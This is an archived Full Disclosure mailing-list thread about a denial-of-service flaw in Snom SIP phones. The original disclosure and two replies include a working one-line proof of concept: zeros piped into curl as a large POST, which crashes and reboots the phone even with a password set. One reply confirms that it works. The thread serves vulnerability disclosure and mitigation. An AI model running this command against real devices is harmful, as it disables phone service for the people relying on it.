[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [FD] Snom SIP phones denial of service through HTTP

To: fulldisclosure@xxxxxxxxxxxx
Subject: Re: [FD] Snom SIP phones denial of service through HTTP
From: Max Mühlbronner <mm@xxxxxxxxx>
Date: Tue, 13 Jan 2015 09:26:42 +0100

Hi,


it works fine for me:

dd if=/dev/zero bs=1M count=32 | curl http://SNOMIP  --data-binary @-


Phone crashes after just a few seconds.


Best Regards

Max M.

On 12.01.2015 22:20, Martin Schuhmacher wrote:

Hi

i just did

$ dd if=/dev/zero bs=1M count=32 | curl http://$IP/
Response: Unauthorized request

did i miss anything?

Firmware: snom360-SIP 8.7.4.8
not downloadable any more for some reason?

Yours
Martin

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


On 12.01.2015 17:56, kapejod@xxxxxxxxxxxxxx wrote:

Snom SIP phones (www.snom.com) have a builtin HTTP/HTTPS configuration
interface, which is enabled by default.

By making a single HTTP POST request all available memory (and CPU) can be
exhausted, resulting in a reboot of the phone.
This even works if the HTTP/HTTPS interface is protected by username and
password (probably the credentials are checked a few more lines later when
the complete request has been received).

Affected models: MP, 3XX, 7XX, 8XX (i didnt have any of the other models to
test)
Affected firmwares: latest stable, latest beta (most likely some others too)
Workaround: Disable HTTP/HTTPS interface completely.

Poc:

dd if=/dev/zero bs=1M count=32 | curl http://IP_OF_PHONE
<http://ip_of_phone/> --data-binary @-

P.S. Just if you are wondering.... I did not notify the vendor about this.
Almost two years ago i reported multiple vulnerabilities directly to the
vendor (including the possibility to install arbitrary software on the
device), but not much has changed since then.

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

References:
- [FD] Snom SIP phones denial of service through HTTP
  - From: kapejod@xxxxxxxxxxxxxx
- Re: [FD] Snom SIP phones denial of service through HTTP
  - From: Martin Schuhmacher

Prev by Date: [FD] Reflecting XSS vulnerability in filemanager of CMS b2evolution v. 5.2.0
Next by Date: Re: [FD] Snom SIP phones denial of service through HTTP
Previous by thread: Re: [FD] Snom SIP phones denial of service through HTTP
Next by thread: Re: [FD] Snom SIP phones denial of service through HTTP
Index(es):
- Date
- Thread